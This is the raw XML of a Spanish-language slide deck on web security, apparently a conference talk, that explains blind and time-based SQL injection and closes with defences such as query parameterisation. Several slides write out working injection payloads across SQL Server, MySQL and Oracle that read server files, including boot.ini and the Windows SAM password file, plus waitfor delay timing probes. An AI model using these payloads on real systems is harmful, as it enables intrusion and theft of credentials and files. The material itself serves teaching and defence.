              <a:rPr lang="en-US" dirty="0"/>
              <a:t>El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fichero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cargado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> en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tabla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> temporal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;(select top 1 ASCII(Substring(column)(file,pos,1)) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>temp_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ??</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fichero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cargado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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consulta</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>En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pasos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fichero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cargado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la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>consulta</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Carga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mucho el motor de base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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;ASCII(Substring(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(file,pos,1))??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6692"/>
            <a:ext cx="8229600" cy="1071546"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>SQL Server 2K - External Data Sources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68772"/>
            <a:ext cx="8229600" cy="5246376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Solo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ficheros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>conocidos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Acceso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>través</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> de Drivers: Txt, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>csv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>mdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>And 200&gt;ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>DefaultDir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>=C:\;','select top 1 * from c:\dir\target.txt’),1,1))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Privilegios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>MSSQLServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>\Providers\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>DisallowAdhocAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" i="1" dirty="0"/>
              <a:t>=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0"/>
              <a:t>Por defecto esta clave no existe en el registro y solo los usuarios con el role Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1"/>
              <a:t>Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0"/>
              <a:t> pueden utilizar estas funciones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Permisos NTFS</a:t>
            </a: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2K – Bulk option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Acceso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a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fichero</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>; Create Table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>TempTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> as (row </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>varchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>(8000)) -- </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>; Bulk Insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>TempTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> From 'c:\file.ext' With (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n‘) -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>; alter table  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>TempTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> add num </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> IDENTITY(1,1) NOT NULL –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>and (select COUNT(row) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>TempTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>and (select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>(row) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>TempTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> where num = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>rownum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>and (select top 1 ASCII(SUBSTRING(row,1,1)) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>TempTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> where num = 1) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>; Drop Table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>TempTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Privilegios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>necesarios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server Role: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Bulkadmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database Role: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>db_owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>db_ddladmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Permisos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> NTFS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-E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2k5 -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Soporte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> a OPENDATASOURCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>OPENROWSET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mejora</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> en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opciones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Bulk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>AND 256 &gt; ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Permisos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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Role de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Bulkadmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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err="1"/>
              <a:t>Activado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> External Data Sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Sp_configure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Surface configuration Tool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Server 2k5</a:t>
            </a:r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0095" y="2039405"/>
            <a:ext cx="4723810" cy="418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MITO III: Con SSL y mi Firewall estoy a salvo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Afirmación común, pero incorrecta</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Aplicación Web + Firewall + SSL = Web Segura</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>El Firewall es una parte integral de la seguridad, pero no es una solución completa en si misma</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Además de bloquear puertos, algunos firewall proporcionan la capacidad de examinar las comunicaciones, proporcionando una avanzada seguridad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>SSL garantiza el cifrado del trafico en la red. Sin embargo no protege a la aplicación de los datos que recibe ni defiende el servidor de una incorrecta configuración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LoadFile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>SELECT LOAD_FILE(0x633A5C626F6F742E696E69)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>SQLbfTools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>MySQLget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>infile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; Create table C8DFC643 (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(4000))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; Load data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>infile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 'c:\\boot.ini' into table C8DFC643</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; alter table C8DFC643 add column num integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>auto_increment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> unique key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and (select count(num) from C8DFC643)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and (select length(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>datos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) from C8DFC643 where num = 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; Drop table C8DFC643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Tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ; execute immediate 'Create table A737D141 ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>datos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only Plain Text files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DBMS_LOB package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/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>. Descarga de Ficheros</a:t>
            </a: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17911"/>
            <a:ext cx="8229600" cy="846980"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time-Based Blind SQL Injection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52988"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>En escenarios donde no hay diferencias entre “True-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Answer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Page” y “False-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Answer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Page”, es posible utilizar las diferencias en los tiempos de respuesta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>La inyección fuerza un retraso en la respuesta de la página cuando la condición inyectada en verdadera.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>- Funciones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>delay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SQL Server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Oracle: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>dbms_lock.sleep</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> o función </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Benchmark</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ejemplo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>;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exists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> *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users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> '0:0:5’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63234"/>
            <a:ext cx="8229600" cy="775542"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Time-Based Blind SQL Injection: Tools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Ninja:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Explota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>función</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>las</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bases d de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>datos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> MSSQL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474778"/>
            <a:ext cx="745879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3163"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Marathon Tool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257676" cy="443484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Automatiza los ataques Time-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Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> usando consultas pesadas en SQL Server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, MS Access y Oracle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Extracción del esquema en las bases de datos conocidas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Extracción de datos usando consultas pesadas en bases de datos sin esquemas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Desarrollada en .NET y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>codigo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> fuente disponible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> http://www.codeplex.com/marathontool</a:t>
            </a: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2" y="2000240"/>
            <a:ext cx="4038600" cy="372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/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>. Base a tiempos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¿Qué hago como desarrollador?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000" dirty="0"/>
              <a:t>ASP.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>Parametrización</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> de las consultas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Uso de </a:t>
            </a:r>
            <a:r>
